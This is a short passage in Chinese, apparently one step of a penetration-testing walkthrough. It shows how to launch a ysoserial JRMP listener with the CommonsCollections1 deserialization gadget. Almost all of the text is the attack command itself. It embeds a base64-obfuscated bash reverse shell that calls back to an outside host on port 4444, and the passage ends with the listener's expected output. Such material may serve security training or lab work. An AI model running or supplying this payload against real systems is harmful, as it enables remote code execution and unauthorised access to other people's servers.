3、在攻击机或vps上开启JRMP Server端口监听,端口随意,这里设置为30080. java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 30080 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExNi4xNDAvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}' 出现Opening JRMP listener on 30080...